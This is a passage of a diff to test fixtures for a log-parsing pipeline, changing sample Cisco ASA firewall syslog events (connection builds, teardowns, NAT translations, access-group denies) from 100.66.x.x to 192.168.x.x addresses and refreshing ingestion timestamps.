"firewall-rule", @@ -5949,8 +5949,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -5985,7 +5985,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.156.80" ] }, @@ -5994,8 +5994,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111682475Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:100.66.19.254/80 (100.66.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385)", + "ingested": "2021-12-09T13:31:36.363610400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:192.168.19.254/80 (192.168.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -6011,7 +6011,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.156.80", - "mapped_source_ip": "100.66.19.254", + "mapped_source_ip": "192.168.19.254", "connection_id": "11797", "source_interface": "outside", "mapped_destination_port": 1385 @@ -6049,8 +6049,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111684125Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:100.66.98.44/8268 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.363614200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6096,8 +6096,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111686039Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:100.66.98.44/8269 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.363619200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6143,8 +6143,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111687686Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:100.66.98.44/8270 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.363623600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6190,8 +6190,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111689325Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:100.66.98.44/8271 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.363628100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6237,8 +6237,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111692195Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:100.66.98.44/8272 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.363633300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6284,8 +6284,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111693913Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:100.66.98.44/8273 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.363639600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6315,8 +6315,8 @@ }, "source": { "port": 80, - "address": "100.66.115.46", - "ip": "100.66.115.46" + "address": "192.168.115.46", + "ip": "192.168.115.46" }, "tags": [ "preserve_original_event" @@ -6351,7 +6351,7 @@ "localhost" ], "ip": [ - "100.66.115.46", + "192.168.115.46", "172.31.156.80" ] }, @@ -6362,8 +6362,8 @@ "severity": 6, "duration": 325000000000, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111695713Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:100.66.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs", + "ingested": "2021-12-09T13:31:36.363645Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:192.168.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:29:31.000Z", @@ -6400,8 +6400,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -6436,7 +6436,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.156.80" ] }, @@ -6447,8 +6447,8 @@ "severity": 6, "duration": 0, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111697358Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:100.66.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363650200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:192.168.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -6480,8 +6480,8 @@ }, "destination": { "port": 8278, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1386, @@ -6521,7 +6521,7 @@ ], "ip": [ "172.31.156.80", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -6529,8 +6529,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111699045Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:100.66.98.44/8278", + "ingested": "2021-12-09T13:31:36.363653900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:192.168.98.44/8278", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -6563,8 +6563,8 @@ }, "source": { "port": 80, - "address": "100.66.115.46", - "ip": "100.66.115.46" + "address": "192.168.115.46", + "ip": "192.168.115.46" }, "tags": [ "preserve_original_event" @@ -6599,7 +6599,7 @@ "localhost" ], "ip": [ - "100.66.115.46", + "192.168.115.46", "172.31.156.80" ] }, @@ -6608,8 +6608,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111700712Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:100.66.115.46/80 (100.66.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386)", + "ingested": "2021-12-09T13:31:36.363658600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:192.168.115.46/80 (192.168.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -6625,7 +6625,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.156.80", - "mapped_source_ip": "100.66.115.46", + "mapped_source_ip": "192.168.115.46", "connection_id": "11798", "source_interface": "outside", "mapped_destination_port": 1386 @@ -6647,8 +6647,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -6682,7 +6682,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -6691,8 +6691,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.111702310Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.363664Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -6728,8 +6728,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -6763,7 +6763,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -6772,8 +6772,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.111703927Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.363668300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -6809,8 +6809,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -6844,7 +6844,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -6853,8 +6853,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.111705650Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.363673400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -6890,8 +6890,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -6925,7 +6925,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -6934,8 +6934,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.111707305Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.363678600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -6971,8 +6971,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7006,7 +7006,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7015,8 +7015,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.111709033Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.363683100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7052,8 +7052,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7087,7 +7087,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7096,8 +7096,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.111710675Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.363687500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7133,8 +7133,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7168,7 +7168,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7177,8 +7177,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.111712385Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.363692300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7214,8 +7214,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7249,7 +7249,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7258,8 +7258,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.111714077Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.363698500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7295,8 +7295,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7330,7 +7330,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7339,8 +7339,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.111715703Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.363703100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7376,8 +7376,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7411,7 +7411,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7420,8 +7420,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.111717377Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.363707100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7457,8 +7457,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7492,7 +7492,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7501,8 +7501,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.111719061Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.363711Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7538,8 +7538,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7573,7 +7573,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7582,8 +7582,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.111720693Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.363716Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7619,8 +7619,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7654,7 +7654,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7663,8 +7663,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.111722323Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.363720800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7695,8 +7695,8 @@ }, "destination": { "port": 8279, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1275, @@ -7736,7 +7736,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -7744,8 +7744,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111724118Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:100.66.98.44/8279", + "ingested": "2021-12-09T13:31:36.363725300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:192.168.98.44/8279", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -7778,8 +7778,8 @@ }, "source": { "port": 80, - "address": "100.66.205.99", - "ip": "100.66.205.99" + "address": "192.168.205.99", + "ip": "192.168.205.99" }, "tags": [ "preserve_original_event" @@ -7814,7 +7814,7 @@ "localhost" ], "ip": [ - "100.66.205.99", + "192.168.205.99", "172.31.98.44" ] }, @@ -7823,8 +7823,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111725754Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:100.66.205.99/80 (100.66.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275)", + "ingested": "2021-12-09T13:31:36.363729900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -7840,7 +7840,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.205.99", + "mapped_source_ip": "192.168.205.99", "connection_id": "11799", "source_interface": "outside", "mapped_destination_port": 1275 @@ -7857,8 +7857,8 @@ }, "destination": { "port": 1190, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 56132, @@ -7898,7 +7898,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -7906,8 +7906,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111727405Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1190", + "ingested": "2021-12-09T13:31:36.363734Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1190", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -7940,8 +7940,8 @@ }, "source": { "port": 53, - "address": "100.66.14.30", - "ip": "100.66.14.30" + "address": "192.168.14.30", + "ip": "192.168.14.30" }, "tags": [ "preserve_original_event" @@ -7976,7 +7976,7 @@ "localhost" ], "ip": [ - "100.66.14.30", + "192.168.14.30", "172.31.98.44" ] }, @@ -7985,8 +7985,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111729107Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:100.66.14.30/53 (100.66.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.363738Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:192.168.14.30/53 (192.168.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -8002,7 +8002,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.14.30", + "mapped_source_ip": "192.168.14.30", "connection_id": "11800", "source_interface": "outside", "mapped_destination_port": 56132 @@ -8024,8 +8024,8 @@ }, "source": { "port": 53, - "address": "100.66.14.30", - "ip": "100.66.14.30" + "address": "192.168.14.30", + "ip": "192.168.14.30" }, "tags": [ "preserve_original_event" @@ -8060,7 +8060,7 @@ "localhost" ], "ip": [ - "100.66.14.30", + "192.168.14.30", "172.31.98.44" ] }, @@ -8070,8 +8070,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111730826Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:100.66.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373", + "ingested": "2021-12-09T13:31:36.363742800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:192.168.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -8108,8 +8108,8 @@ }, "source": { "port": 53, - "address": "100.66.252.210", - "ip": "100.66.252.210" + "address": "192.168.252.210", + "ip": "192.168.252.210" }, "tags": [ "preserve_original_event" @@ -8144,7 +8144,7 @@ "localhost" ], "ip": [ - "100.66.252.210", + "192.168.252.210", "172.31.98.44" ] }, @@ -8153,8 +8153,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111732496Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:100.66.252.210/53 (100.66.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.363748800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:192.168.252.210/53 (192.168.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -8170,7 +8170,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.252.210", + "mapped_source_ip": "192.168.252.210", "connection_id": "11801", "source_interface": "outside", "mapped_destination_port": 56132 @@ -8192,8 +8192,8 @@ }, "source": { "port": 53, - "address": "100.66.252.210", - "ip": "100.66.252.210" + "address": "192.168.252.210", + "ip": "192.168.252.210" }, "tags": [ "preserve_original_event" @@ -8228,7 +8228,7 @@ "localhost" ], "ip": [ - "100.66.252.210", + "192.168.252.210", "172.31.98.44" ] }, @@ -8238,8 +8238,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111734134Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:100.66.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207", + "ingested": "2021-12-09T13:31:36.363753400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:192.168.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -8271,8 +8271,8 @@ }, "destination": { "port": 8280, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1276, @@ -8312,7 +8312,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -8320,8 +8320,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111735796Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:100.66.98.44/8280", + "ingested": "2021-12-09T13:31:36.363758Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -8354,8 +8354,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -8390,7 +8390,7 @@ "localhost" ], "ip": [ - 